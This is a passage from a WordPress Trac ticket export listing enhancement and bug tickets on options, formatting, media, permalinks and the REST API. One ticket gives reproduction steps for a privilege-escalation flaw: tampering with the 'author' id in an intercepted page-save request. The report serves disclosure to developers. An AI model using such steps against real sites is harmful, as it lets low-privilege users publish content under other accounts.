entire handling of an action * easy addition of any custom actions in plugins, beyond just bulk actions (which have become easier to implement thanks to 4.7) I have been experimenting with such a class over the past few hours and will upload a first patch below. Some notes: * The class usage is almost similar to all the list table classes: There's a base class, and then there's (or rather there will be) one class (which extends the base class) for each screen that could benefit from that. * Many of the actions have similarities: They mostly use `check_admin_referer()` at the beginning, followed by some capability and other permission checks to verify the user is allowed to perform the action. Therefore the base class should be able to handle nonces on its own. The capability checks should be separated from the actual action logic for better organization and easier testing. * Many of the actions redirect back to the admin page, with a GET parameter denoting a notification message to show to the user. `WP_Action_Handler` should also be capable of managing such messages to make that easier as well. This will furthermore allow to remove a bunch of code from the admin screen files where they ""bootstrap"" their supported messages. More notes will follow on the initial patch." flixos90 Future Releases 56548 Introduce `get_option` action Options, Meta APIs normal normal Awaiting Review enhancement new needs-unit-tests 2022-09-11T19:00:11Z 2022-09-11T20:14:00Z "There has been the `option_{$option}` filter for a long time, and it makes sense that this filter should be used to tweak options when reading them. However, there is sometimes a need for running certain logic for when an option is being read. For example, the WordPress performance team is currently working on a feature to optimize the autoloaded options list. For such purposes, we would like to add a new `get_option` action: * The reasoning for making it an action is to not falsely encourage developers to think they could use this to filter an option value (which would be excessive since it would be running for every option read). * The action would get parameters for the option name, the value, and whether the value is based on the default (rather than being looked up from the database). * The action name would be aligned with the existing actions `add_option`, `update_option`, and `delete_option`. * It would be documented so that it should only be used for special cases (similar to e.g. the `all` filter)." flixos90 Future Releases 43147 Introduce `esc_html_comment` and translation related functions Formatting normal normal Awaiting Review enhancement new dev-feedback 2018-01-23T15:27:17Z 2019-01-16T06:50:09Z "Triggered by the following PR on Yoast SEO [https://github.com/Yoast/wordpress-seo/pull/8687 #8687] I saw the need for `esc_html_comment` functionality in WordPress. This patch is based on the current API for formatting and escaping functions. The implementation is based on the specifications found on the [https://www.w3.org/TR/html51/syntax.html#sec-comments HTML specifications page]. I've added unit tests to cover the situations that I could come up with." jipmoors Future Releases 43621 Introduce `add_action_once` and `add_filter_once` sugar. Plugins normal normal Awaiting Review feature request new dev-feedback 2018-03-23T17:49:45Z 2018-04-06T17:12:29Z "It is often useful (especially when writing tests for filters, actions) to run a callback only once, regardless of how many times the filter/action is actually applied/done. {{{ add_filter_once( 'test_action_once', '__return_true' ); $this->assertTrue( apply_filters( 'test_action_once', false ) ); $this->assertFalse( apply_filters( 'test_action_once', false ) ); }}} This would allow developers to run anonymous callbacks that remove themselves from the filter after running once. This can currently be done with the following ugly workarounds: {{{ add_action( 'run_many_times', function() { // do stuff once and self-destruct remove_action( 'run_many_times', current( $GLOBALS['wp_filter'][ current_filter() ]->callbacks[ 10 ] )['function'] ); } ); }}} or {{{ $once = null; add_action( 'run_many_times', $null = function() use ( &$once ) { // do stuff once and self-destruct remove_action( 'run_many_times', $once ); } ); }}} This is '''not''' a duplicate of #38743, the concept is different, the naming is the same, yes. Non-clashing names here? - `​add_self_destructing_filter()` - `add_ephemeral_filter()` open to other suggestions :)" soulseekah Future Releases 55840 Internationalization support for sizes added by 'edit_custom_thumbnail_sizes' filter antpb Media 6.0 normal normal Future Release enhancement assigned dev-feedback 2022-05-26T08:33:48Z 2024-01-29T20:35:15Z "The image size labels added by the edit_custom_thumbnail_sizes filter are not internationalized. {{{ <label for=""imgedit-target-custom<?php echo esc_attr( $key ); ?>""><?php echo esc_html( $size ); ?></label> }}} In a Japanese environment, there will be a mixture of translated and untranslated text. To solve this problem, the following size of translated text is prepared before the loop process. {{{ $size_names = array( 'thumbnail' => __( 'Thumbnail' ), 'medium' => __( 'Medium' ), 'medium_large' => __( 'Medium Large' ), 'large' => __( 'Large' ), 'full' => __( 'Full Size' ), ); }}} Change the following where labels are output. {{{ <label for=""imgedit-target-custom<?php echo esc_attr( $key ); ?>""><?php echo esc_html( isset( $size_names[$size] )? $size_names[$size] : $size ); ?></label> }}} Since image size labels are also used in the ""image_size_input_fields"" function, etc., it may be better to make them a function rather than an array. In addition, the translated text for ""Medium-Large size image height"" and ""Medium-Large size image width"" exists, but the translated text for ""Medium Large (or Medium-Large)"" does not. If you are conscious of word commonality, ""Medium-Large"" may be better than ""Medium Large"". " tmatsuur Future Releases 57437 "Insecure Direct Object Reference in ""author"" parameter while making a page live Leads to Vertical Privilege Escalation on a Different Account" Posts, Post Types 6.1.1 normal normal Awaiting Review defect (bug) new dev-feedback 2023-01-10T03:59:47Z 2023-01-12T02:41:14Z "{I've reported it on hackerone, they said its a bug, report it as a bug} Description: There is an Insecure Direct Object Reference in the author parameter that lets a user, set the author id to a different author, which doesnt have the rights to edit/publish the page Steps To Reproduce: Create a Page. Click on settings ICON in the page in the editor. Note that in the page section you can edit the author of page, with the list of available users. Choose a legitimate user and intercept the request. Now in the request there is an author parameter which has the id of user ""author"":id,. Change this id to a user who doesn't have the right to publish or edit the post. 6.By changing the id to a user who has no role for the wordpress, you can see that the user is now the author for the page. Thanks! Please check attached video POC for more clarity. Recommendations Make sure to check for what values of author parameter are being parsed by the backend and check if the id being passed does have the right to do so. Impact Privilege Escalation For an Unintended User/Low priv user Bypass secure Design and post unwanted content from other's account." f41z4n Future Releases 52463 Inline SVG - foreignObject support Formatting 5.6.1 normal normal Awaiting Review defect (bug) new dev-feedback 2021-02-07T11:06:11Z 2021-02-09T21:20:15Z "WordPress 5.6.1 mangles SVGs which use the [Foreign Object element](https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject). Consider this minimum viable example: {{{ <svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink""> <foreignObject> <blockquote xmlns=""http://www.w3.org/1999/xhtml""> Hello </blockquote> </foreignObject> </svg> }}} WordPress adds in some `</p>` which malforms the image: {{{ <p> <svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink""> <foreignObject></p> <blockquote xmlns=""http://www.w3.org/1999/xhtml""><p> Hello </p></blockquote> <p></foreignObject> </svg></p> }}} This occurs when pasting the raw SVG into the classic editor." edent Future Releases 58519 Inline styles block styles in bundled themes Bundled Theme 5.8 normal normal Awaiting Review enhancement new dev-feedback 2023-06-12T14:11:07Z 2023-06-19T16:59:26Z "In [50836] function was added, to inline block styles, so for better performance. There are a number of small stylesheets in bundled themes that could do with that could use this functionality. To opt-in a stylesheet, simply add the path add an extra piece of data of the stylesheet. Like this. {{{#!php wp_enqueue_style( 'twentyfifteen-block-style', get_template_directory_uri() . '/css/blocks.css', array( 'twentyfifteen-style' ), '20230122' ); wp_style_add_data( 'twentyfifteen-block-style', 'path', get_template_directory() . '/css/blocks.css' ); }}} This could improve FE performance, as it remove a blocking request. " spacedmonkey Future Releases 31570 Infinite loop when filtering Media Library images by size in a modal (using wp_prepare_attachment_for_js) fuhton Media 4.1.1 normal normal defect (bug) assigned dev-feedback 2015-03-09T13:48:25Z 2019-06-04T20:11:46Z "In an attempt to restrict a post's Featured Image dimensions to imagers wider than 100px I implement the following code in `functions.php`: {{{ function restrict_media_library_by_width($response, $attachment, $meta) { if(isset($response['width']) && isset($response['height']) && $response['width'] > 100) { return $response; } return false; } add_filter('wp_prepare_attachment_for_js', 'restrict_media_library_by_width', 10, 3); }}} I then click ""Set featured image"" and the Media Library modal that appears only loads one empty thumbnail and my Network panel in Chrome Dev Tools reveals it makes continued, repeated, infinite AJAX requests. The only viable alternative I've found was to run a separate query within `ajax_query_attachments_args`, which is needed because the `_wp_attachment_metadata` key contains serialized data and that leaves no way to compare dimensions within a `meta_query`. Obviously running this additional query is inefficient and more resource intensive than it should be. More details here: http://wordpress.stackexchange.com/questions/180500/filter-media-library-items-by-size/." silb3r Future Releases 60694 INDEX command denied to user 'wordpress'@'localhost' for table 'wp_trp_dictionary_bg_bg_en_us' Upgrade/Install 6.4.3 normal normal Awaiting Review defect (bug) new dev-feedback 2024-03-05T15:14:32Z 2024-03-05T15:14:32Z "Fresh install of Version 6.4.3. The only active plugin is TranslatePress - Multilingual Version 2.7.2 (Akismet and Hello Dolly are installed but not active). Loggin in as admin, the following error is displayed: INDEX command denied to user 'wordpress'@'localhost' for table 'wp_trp_dictionary_bg_bg_en_us'. phpMyAdmin shows that the wordpress user does not have the 'INDEX' privilege. Is there a reason why the INDEX privilege not be enabled for the wordpress database user?" 4x4ever Future Releases 48167 "Increase discoverability of, and describe, ""Anyone can register"" and other settings" Administration normal normal Awaiting Review enhancement new dev-feedback 2019-09-29T10:44:07Z 2019-10-02T13:13:32Z "Right now, after installation, it is not possible to register until the user enables Anyone Can Register option from Settings -> General area. Which is confusing for the general user. If it can be enabled by default that would be really time-saving. Also, this option can be added to the installation setup-wizard of WordPress. Screenshot- https://prnt.sc/pcf1xf" nazmulhassann20 Future Releases 54070 "Increase CPT ""machine name"" limit from its current maximum of 20 characters." Database 2.1 normal normal Awaiting Review feature request new dev-feedback 2021-09-03T13:30:04Z 2022-10-04T18:08:03Z "In order to accommodate proper namespacing for Custom Post Types (as well as, potentially, transliteration from non-Latin alphabets), 20 characters is often not enough. Custom Taxonomies currently have a machine name limit of 32 characters. It would be nice to see CPTs have at least that many, although 64 characters would be even better." taupecat Future Releases 42140 Incorrect use of plural in class-wp-customize-themes-section.php SergeyBiryukov Customize 4.9 normal normal Future Release defect (bug) reviewing dev-feedback 2017-10-08T07:05:41Z 2021-06-08T23:23:42Z "Use of {{{__()}}} where {{{_n()}}} is needed. /wp-includes/customize/class-wp-customize-themes-section.php {{{ /* translators: %s: number of themes displayed. */ echo sprintf( __( '%s themes' ), '<span class=""theme-count"">0</span>' ); }}} " tobifjellner Future Releases 58764 Incorrect return type in `WP_Rewrite::using_index_permalinks()`. costdev Permalinks 2.7 normal normal Awaiting Review defect (bug) assigned dev-feedback 2023-07-08T10:08:29Z 2023-07-31T12:58:33Z "== Overview In [8899], [https://github.com/WordPress/wordpress-develop/blob/6.2/src/wp-includes/class-wp-rewrite.php#L357-L373 WP_Rewrite::using_index_permalinks()] was documented to return `bool`. However, its actual return type is `int|false`. A guard explicitly returns `false`, however the final return statement returns the result of a `preg_match()` call. Per [https://www.php.net/manual/en/function.preg-match.php the PHP manual]: > `preg_match()` returns 1 if the pattern matches given subject, 0 if it does not, or false on failure. == Docs change, or `bool` cast? === Docs change We could change the return type to: {{{#!php @return int|false 1 if permalink links are enabled and index.php is in the URL, 0 if permalinks are enabled but there was a failure, false if permalinks are disabled. }}} However, I think this is an overly complicated return for a method called `using_index_permalinks()` that suggests, and is currently documented as, a simple `bool` return type. === `bool` cast: Is there a backward compatibility concern? Yes, but a very small one. WP Directory shows: - [https://wpdirectory.net/search/01H4T8ZA3EYAHNCJH57EKTSYH2 all 135 plugins] and [https://wpdirectory.net/search/01H4TEEJ598PDEK1WCRJ4C3SGW all 138 themes] that call this method use a loose check on the result, treating `0` and `false` as ""No, it does not use index permalinks"". These are safe from a `(bool)` cast. - It's possible that someone out there is using `1 === $wp_rewrite->using_index_permalinks()`, but as the method is documented to return `bool`, they're most likely using a loose check after an assumed attempt of `true ===` would have always failed, as the method currently ''never'' returns `true`. === When does `preg_match()` return `false`? Per PHP-src, a call to [https://github.com/php/php-src/blob/c6b9db2131deda7ca0683a6006fe9ae8dd767f51/ext/pcre/php_pcre.c#L1465 preg_match] eventually leads to [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L589C26-L589C58 pcre_get_compiled_regex_cache_ex]. The following failure conditions are listed: - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L642 Empty regular expression] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L654 Delimiter must not be alphanumeric, backslash, or NUL] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L698 No ending delimiter '%c' found] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L700 No ending matching delimiter '%c' found] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L750 Unknown modifier '%c'] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L752 NUL is not a valid modifier] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L764 The /e modifier is no longer supported, use preg_replace_callback instead] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L779 Failed to generate locale character tables] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L801 Compilation failed: %s at offset %zu] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L852 Internal pcre2_pattern_info() error %d] - [https://github.com/php/php-src/blob/master/ext/pcre/php_pcre.c#L862 Internal pcre_pattern_info() error %d] === Which of these failures could happen here? In the context of `WP_Rewrite::using_index_permalinks()`, there is only one possible failure: `WP_Rewrite::$index` contains the delimiter, `#`. [https://3v4l.org/M94EH 3v4l]. The `index` property is set to `'index.php'` by default. However, it's a `public` property and could therefore be directly overridden, or set in a subclass of `WP_Rewrite`. WP Directory shows: - [https://wpdirectory.net/search/01H4TBP4HXJZQ8G58BGB6A0QFE 0 plugins] directly assign a value to this property. - [https://wpdirectory.net/search/01H4TBT9RAKWGY41CCPD320RBA 0 themes] directly assign a value to this property. - [https://wpdirectory.net/search/01H4TBW9JQNVX9Q580Z0FPD6DH 1 plugin] extends the `WP_Rewrite` class, but does not set a value for the property. - [https://wpdirectory.net/search/01H4TC0P3CYKZ27FK2KBGJQSP5 0 themes] extend the `WP_Rewrite` class. === Can we prevent the potential failure? Yes, by using `preg_quote( $this->index, '#' )`. [https://3v4l.org/CYsS7 3v4l]. === ''Should'' we prevent the potential failure? As demonstrated by the failure, the regex is currently susceptible to special characters. When the default value of `$this->index` (`'index.php'`) is concatenated, the resulting pattern is `'#^/*index.php#'`. See the `.`? The `preg_match()` call is currently vulnerable to `index[any character except newline]php`. [https://3v4l.org/LQSOG 3v4l]. Given this, it's possible that a developer out there has set a custom `$index` value that contains a regex pattern. However, I think that's very unlikely. Contrarily, the flawed regex has the potential to cause false positives if, for example, the permalink structure starts with `/index2php`. While that's also unlikely, using `preg_quote()` here would prevent that false positive. ----- == Call for opinions 1. Should we just change the documented return type and description? If so, what makes sense here? 2. OR should we cast the result to `bool`? 3. ADDITIONALLY should we use `preg_quote()` here to prevent the potential failure?" costdev Future Releases 55309 Incorrect post comment count after deleting comment with replies Comments 5.9.1 normal normal Awaiting Review defect (bug) new dev-feedback 2022-03-03T16:29:07Z 2022-03-03T17:50:55Z "If you move a comment to the trash, and that comment has sub-comments, none of those comments are visible (which is desired) but post->comment_count is reduced by 1 rather than by the total number of comments that have now been hidden. For example: post has 1 comment with 3 replies. Comment count is 4. Delete the first comment. Now no comments are visible but comment count is 3. The first comment has comment_approved set to 'trash' but the other 3 comments are still '1'. Perhaps the right fix is that when trashing a comment, all of its sub-comments are also trashed explicitly rather than implicitly." jwz Future Releases 49129 Incorrect German Umlaut substitutions Formatting 5.4 normal minor Awaiting Review enhancement new dev-feedback 2020-01-04T00:18:46Z 2020-01-04T09:39:30Z "Hello, as a native speaker, I find the German Umlaut substitutions quite strange. Correctly, ü is turned into ue, but Ü is turned into Ue. Since the second character should be considered as part of the former character, the former capitalization should be respected. This is especially strange in uppercase text: FRÖHLICH -> FROeHLICH KÖNNEN -> KOeNNEN If it was changed to be all uppercase, it would work much better: FRÖHLICH -> FROEHLICH KÖNNEN -> KOENNEN When used at the start of a word, it would also work fine, if capitalized: ÖFFENTLICH -> OEffentlich ÜBERGANG -> UEbergang Therefore, I would propose changing the table located in wp-includes/formatting.php:1941 (https://github.com/WordPress/WordPress/blob/master/wp-includes/formatting.php#L1941) to the following: {{{ if ( 'de_DE' == $locale || 'de_DE_formal' == $locale || 'de_CH' == $locale || 'de_CH_informal' == $locale ) { $chars['Ä'] = 'AE'; $chars['ä'] = 'ae'; $chars['Ö'] = 'OE'; $chars['ö'] = 'oe'; $chars['Ü'] = 'UE'; $chars['ü'] = 'ue'; $chars['ß'] = 'ss'; }}} Though, to be entirely correct, the surrounding characters would have to be checked, which would be difficult, given the current architecture. There even is a capital ß now, which would be substituted with SS. I am happy to hear any second opinions on this. Best regards, Benedikt" bmuessig Future Releases 10543 Incorrect (non-UTF-8) character handling in tag's name and slug westi* Charset 2.8.2 normal normal defect (bug) accepted needs-unit-tests 2009-08-04T05:26:11Z 2019-06-04T19:21:33Z "Incorrect (non-UTF-8) character tag's name and slug are handled in different way: name is truncated on 1st such character, and in slug they are just removed (no truncation). WP should handle both in the same way - drop invalid characters, instead of truncation. I found this issue recently. One of the Polish programs for adding posts to the Wordpresses does not encode tags in UTF-8 - it left them in ISO-8859-2. I notified author of this bug. Unfortunately there are many copies around, so it may take a long time before everyone upgrade." sirzooro Future Releases 8994 Incorporate MediaRSS Plugin into core technosailor Feeds normal normal Future Release feature request new dev-feedback 2009-01-29T18:00:20Z 2021-02-07T22:38:35Z Per conversation on the hackers list, this ticket is a working area for incorporation of the MediaRSS plugin (http://wordpress.org/extend/plugins/mrss) into core for WP 2.8. technosailor Future Releases 27747 Inconsistent type default between `submit_button()` and `get_submit_button()` Administration 3.5 normal normal Awaiting Review defect (bug) new dev-feedback 2014-04-10T08:03:52Z 2023-12-06T11:23:51Z "One defaults to `$type = 'primary'` while the other defaults to `$type = 'primary large'`. Shouldn't that last one be `$type = 'primary'` too?" Denis-de-Bernardy Future Releases 59149 Inconsistent Behaviour of Block Editor while Adding/Searching for Blocks Editor 6.3 normal normal Awaiting Review defect (bug) new dev-feedback 2023-08-19T05:56:17Z 2023-09-02T06:32:59Z "WP Version 6.3 I'm facing an strange issue while searching the fields from the block editor. When I'm at the end of page or when scroll to end of page then I'm trying to search a custom block it suddenly jump from its position. for details refer the below video url for same. https://www.awesomescreenshot.com/video/20061317?key=12384a49ae5e729e95556d9498c1a107 " dhruval04 Future Releases 59991 Included imagesLoaded libary broken External Libraries 6.4 normal normal 6.6 defect (bug) new dev-feedback 2023-11-30T10:48:57Z 2024-02-17T14:24:15Z On the current WordPress release version, the included imagesLoaded javascript file is broken. The minified file appears to include two minified versions of the actual script and breaks functionality. To reproduce, see wp-includes/js/imagesloaded.min.js. physalis Future Releases 44906 "Include greek accent characters on ""remove_accents"" function" Formatting 4.9.8 normal minor Awaiting Review enhancement new dev-feedback 2018-09-06T19:53:57Z 2018-09-13T01:19:43Z "Hi, I extended the ""remove_accents"" function to support greek accents. If you wish you can add it in core. I have just added greek characters after: {{{#!php elseif ( 'el' == $locale ) { }}} Thanks {{{#!php <?php function remove_accents( $string ) { if ( !preg_match('/[\x80-\xff]/', $string) ) return $string; if (seems_utf8($string)) { $chars = array( // Decompositions for Latin-1 Supplement 'ª' => 'a', 'º' => 'o', 'À' => 'A', 'Á' => 'A', 'Â' => 'A', 'Ã' => 'A', 'Ä' => 'A', 'Å' => 'A', 'Æ' => 'AE','Ç' => 'C', 'È' => 'E', 'É' => 'E', 'Ê' => 'E', 'Ë' => 'E', 'Ì' => 'I', 'Í' => 'I', 'Î' => 'I', 'Ï' => 'I', 'Ð' => 'D', 'Ñ' => 'N', 'Ò' => 'O', 'Ó' => 'O', 'Ô' => 'O', 'Õ' => 'O', 'Ö' => 'O', 'Ù' => 'U', 'Ú' => 'U', 'Û' => 'U', 'Ü' => 'U', 'Ý' => 'Y', 'Þ' => 'TH','ß' => 's', 'à' => 'a', 'á' => 'a', 'â' => 'a', 'ã' => 'a', 'ä' => 'a', 'å' => 'a', 'æ' => 'ae','ç' => 'c', 'è' => 'e', 'é' => 'e', 'ê' => 'e', 'ë' => 'e', 'ì' => 'i', 'í' => 'i', 'î' => 'i', 'ï' => 'i', 'ð' => 'd', 'ñ' => 'n', 'ò' => 'o', 'ó' => 'o', 'ô' => 'o', 'õ' => 'o', 'ö' => 'o', 'ø' => 'o', 'ù' => 'u', 'ú' => 'u', 'û' => 'u', 'ü' => 'u', 'ý' => 'y', 'þ' => 'th', 'ÿ' => 'y', 'Ø' => 'O', // Decompositions for Latin Extended-A 'Ā' => 'A', 'ā' => 'a', 'Ă' => 'A', 'ă' => 'a', 'Ą' => 'A', 'ą' => 'a', 'Ć' => 'C', 'ć' => 'c', 'Ĉ' => 'C', 'ĉ' => 'c', 'Ċ' => 'C', 'ċ' => 'c', 'Č' => 'C', 'č' => 'c', 'Ď' => 'D', 'ď' => 'd', 'Đ' => 'D', 'đ' => 'd', 'Ē' => 'E', 'ē' => 'e', 'Ĕ' => 'E', 'ĕ' => 'e', 'Ė' => 'E', 'ė' => 'e', 'Ę' => 'E', 'ę' => 'e', 'Ě' => 'E', 'ě' => 'e', 'Ĝ' => 'G', 'ĝ' => 'g', 'Ğ' => 'G', 'ğ' => 'g', 'Ġ' => 'G', 'ġ' => 'g', 'Ģ' => 'G', 'ģ' => 'g', 'Ĥ' => 'H', 'ĥ' => 'h', 'Ħ' => 'H', 'ħ' => 'h', 'Ĩ' => 'I', 'ĩ' => 'i', 'Ī' => 'I', 'ī' => 'i', 'Ĭ' => 'I', 'ĭ' => 'i', 'Į' => 'I', 'į' => 'i', 'İ' => 'I', 'ı' => 'i', 'IJ' => 'IJ','ij' => 'ij', 'Ĵ' => 'J', 'ĵ' => 'j', 'Ķ' => 'K', 'ķ' => 'k', 'ĸ' => 'k', 'Ĺ' => 'L', 'ĺ' => 'l', 'Ļ' => 'L', 'ļ' => 'l', 'Ľ' => 'L', 'ľ' => 'l', 'Ŀ' => 'L', 'ŀ' => 'l', 'Ł' => 'L', 'ł' => 'l', 'Ń' => 'N', 'ń' => 'n', 'Ņ' => 'N', 'ņ' => 'n', 'Ň' => 'N', 'ň' => 'n', 'ʼn' => 'n', 'Ŋ' => 'N', 'ŋ' => 'n', 'Ō' => 'O', 'ō' => 'o', 'Ŏ' => 'O', 'ŏ' => 'o', 'Ő' => 'O', 'ő' => 'o', 'Œ' => 'OE','œ' => 'oe', 'Ŕ' => 'R','ŕ' => 'r', 'Ŗ' => 'R','ŗ' => 'r', 'Ř' => 'R','ř' => 'r', 'Ś' => 'S','ś' => 's', 'Ŝ' => 'S','ŝ' => 's', 'Ş' => 'S','ş' => 's', 'Š' => 'S', 'š' => 's', 'Ţ' => 'T', 'ţ' => 't', 'Ť' => 'T', 'ť' => 't', 'Ŧ' => 'T', 'ŧ' => 't', 'Ũ' => 'U', 'ũ' => 'u', 'Ū' => 'U', 'ū' => 'u', 'Ŭ' => 'U', 'ŭ' => 'u', 'Ů' => 'U', 'ů' => 'u', 'Ű' => 'U', 'ű' => 'u', 'Ų' => 'U', 'ų' => 'u', 'Ŵ' => 'W', 'ŵ' => 'w', 'Ŷ' => 'Y', 'ŷ' => 'y', 'Ÿ' => 'Y', 'Ź' => 'Z', 'ź' => 'z', 'Ż' => 'Z', 'ż' => 'z', 'Ž' => 'Z', 'ž' => 'z', 'ſ' => 's', // Decompositions for Latin Extended-B 'Ș' => 'S', 'ș' => 's', 'Ț' => 'T', 'ț' => 't', // Euro Sign '€' => 'E', // GBP (Pound) Sign '£' => '', // Vowels with diacritic (Vietnamese) // unmarked 'Ơ' => 'O', 'ơ' => 'o', 'Ư' => 'U', 'ư' => 'u', // grave accent 'Ầ' => 'A', 'ầ' => 'a', 'Ằ' => 'A', 'ằ' => 'a', 'Ề' => 'E', 'ề' => 'e', 'Ồ' => 'O', 'ồ' => 'o', 'Ờ' => 'O', 'ờ' => 'o', 'Ừ' => 'U', 'ừ' => 'u', 'Ỳ' => 'Y', 'ỳ' => 'y', // hook 'Ả' => 'A', 'ả' => 'a', 'Ẩ' => 'A', 'ẩ' => 'a', 'Ẳ' => 'A', 'ẳ' => 'a', 'Ẻ' => 'E', 'ẻ' => 'e', 'Ể' => 'E', 'ể' => 'e', 'Ỉ' => 'I', 'ỉ' => 'i', 'Ỏ' => 'O', 'ỏ' => 'o', 'Ổ' => 'O', 'ổ' => 'o', 'Ở' => 'O', 'ở' => 'o', 'Ủ' => 'U', 'ủ' => 'u', 'Ử' => 'U', 'ử' => 'u', 'Ỷ' => 'Y', 'ỷ' => 'y', // tilde 'Ẫ' => 'A', 'ẫ' => 'a', 'Ẵ' => 'A', 'ẵ' => 'a', 'Ẽ' => 'E', 'ẽ' => 'e', 'Ễ' => 'E', 'ễ' => 'e', 'Ỗ' => 'O', 'ỗ' => 'o', 'Ỡ' => 'O', 'ỡ' => 'o', 'Ữ' => 'U', 'ữ' => 'u', 'Ỹ' => 'Y', 'ỹ' => 'y', // acute accent 'Ấ' => 'A', 'ấ' => 'a', 'Ắ' => 'A', 'ắ' => 'a', 'Ế' => 'E', 'ế' => 'e', 'Ố' => 'O', 'ố' => 'o', 'Ớ' => 'O', 'ớ' => 'o', 'Ứ' => 'U', 'ứ' => 'u', // dot below 'Ạ' => 'A', 'ạ' => 'a', 'Ậ' => 'A', 'ậ' => 'a', 'Ặ' => 'A', 'ặ' => 'a', 'Ẹ' => 'E', 'ẹ' => 'e', 'Ệ' => 'E', 'ệ' => 'e', 'Ị' => 'I', 'ị' => 'i', 'Ọ' => 'O', 'ọ' => 'o', 'Ộ' => 'O', 'ộ' => 'o', 'Ợ' => 'O', 'ợ' => 'o', 'Ụ' => 'U', 'ụ' => 'u', 'Ự' => 'U', 'ự' => 'u', 'Ỵ' => 'Y', 'ỵ' => 'y', // Vowels with diacritic (Chinese, Hanyu Pinyin) 'ɑ' => 'a', // macron 'Ǖ' => 'U', 'ǖ' => 'u', // acute accent 'Ǘ' => 'U', 'ǘ' => 'u', // caron 'Ǎ' => 'A', 'ǎ' => 'a', 'Ǐ' => 'I', 'ǐ' => 'i', 'Ǒ' => 'O', 'ǒ' => 'o', 'Ǔ' => 'U', 'ǔ' => 'u', 'Ǚ' => 'U', 'ǚ' => 'u', // grave accent 'Ǜ' => 'U', 'ǜ' => 'u', ); // Used for locale-specific rules $locale = get_locale(); if ( 'de_DE' == $locale || 'de_DE_formal' == $locale || 'de_CH' == $locale || 'de_CH_informal' == $locale ) { $chars[ 'Ä' ] = 'Ae'; $chars[ 'ä' ] = 'ae'; $chars[ 'Ö' ] = 'Oe'; $chars[ 'ö' ] = 'oe'; $chars[ 'Ü' ] = 'Ue'; $chars[ 'ü' ] = 'ue'; $chars[ 'ß' ] = 'ss'; } elseif ( 'da_DK' === $locale ) { $chars[ 'Æ' ] = 'Ae'; $chars[ 'æ' ] = 'ae'; $chars[ 'Ø' ] = 'Oe'; $chars[ 'ø' ] = 'oe'; $chars[ 'Å' ] = 'Aa'; $chars[ 'å' ] = 'aa'; } elseif ( 'ca' === $locale ) { $chars[ 'l·l' ] = 'll'; } elseif ( 'sr_RS' === $locale || 'bs_BA' === $locale ) { $chars[ 'Đ' ] = 'DJ'; $chars[ 'đ' ] = 'dj'; } elseif ( 'el' == $locale ) { $chars[ 'Ά' ] = 'Α'; $chars[ 'ά' ] = 'α'; $chars[ 'Έ' ] = 'Ε'; $chars[ 'έ' ] = 'α'; $chars[ 'Ί' ] = 'Ι'; $chars[ 'ί' ] = 'ι'; $chars[ 'ΐ' ] = 'ϊ'; $chars[ 'Ύ' ] = 'Υ'; $chars[ 'ύ' ] = 'υ'; $chars[ 'ΰ' ] = 'ϋ'; $chars[ 'Ή' ] = 'Η'; $chars[ 'ή' ] = 'η'; $chars[ 'Ό' ] = 'Ο'; $chars[ 'ό' ] = 'ο'; $chars[ 'Ώ' ] = 'Ω'; $chars[ 'ώ' ] = 'ω'; } $string = strtr($string, $chars); } else { $chars = array(); // Assume ISO-8859-1 if not UTF-8 $chars['in'] = ""\x80\x83\x8a\x8e\x9a\x9e"" .""\x9f\xa2\xa5\xb5\xc0\xc1\xc2"" .""\xc3\xc4\xc5\xc7\xc8\xc9\xca"" .""\xcb\xcc\xcd\xce\xcf\xd1\xd2"" .""\xd3\xd4\xd5\xd6\xd8\xd9\xda"" .""\xdb\xdc\xdd\xe0\xe1\xe2\xe3"" .""\xe4\xe5\xe7\xe8\xe9\xea\xeb"" .""\xec\xed\xee\xef\xf1\xf2\xf3"" .""\xf4\xf5\xf6\xf8\xf9\xfa\xfb"" .""\xfc\xfd\xff""; $chars['out'] = ""EfSZszYcYuAAAAAACEEEEIIIINOOOOOOUUUUYaaaaaaceeeeiiiinoooooouuuuyy""; $string = strtr($string, $chars['in'], $chars['out']); $double_chars = array(); $double_chars['in'] = array(""\x8c"", ""\x9c"", ""\xc6"", ""\xd0"", ""\xde"", ""\xdf"", ""\xe6"", ""\xf0"", ""\xfe""); $double_chars['out'] = array('OE', 'oe', 'AE', 'DH', 'TH', 'ss', 'ae', 'dh', 'th'); $string = str_replace($double_chars['in'], $double_chars['out'], $string); } return $string; } }}} " papazetis Future Releases 52840 Include filesize information in REST API response for all media types rachelbaker* REST API normal normal Future Release enhancement accepted needs-unit-tests 2021-03-17T21:50:29Z 2023-01-13T21:45:46Z "Requesting the `/media` REST API endpoint, only **audio** attachments include filesize information in the response data (in `media_details->filesize`). I suggest to check for each item if `filesize` is present, or else fill it in using the actual file. This would be pretty much in line with what is done in [https://github.com/WordPress/wordpress-develop/blob/fa05e5e7336a18c19fe6a94d68d30351876ee090/src/wp-includes/media.php#L3972-L3980 wp_prepare_attachment_for_js]. Making the information available locally, when creating the response data, is much more performant than having to request the file in one or more follow-up requests." tfrommen Future Releases 16293 In multisite installs, users with id 1 can't be deleted Users normal normal Future Release defect (bug) reopened needs-unit-tests 2011-01-19T00:21:34Z 2024-02-08T20:18:09Z "You can't delete a user with user id of 1. See: source:trunk/wp-admin/network/edit.php@17326#L359" PeteMall Future Releases 28156 In date-containing permalink structures, /dddd/dd/comment-page-d/ urls don't work Permalinks 3.9 normal normal defect (bug) new needs-unit-tests 2014-05-06T22:42:17Z 2019-06-04T20:46:56Z "I was in the process of writing a plugin to allow people to test their rewrite rules as they develop a site, and when I setup examples of core rewrite rules, one of them was failing. If you set your permalink structure to one containing dates, e.g. ""Day and Name"", one of the generated rewrite rules for posts is: {{{ 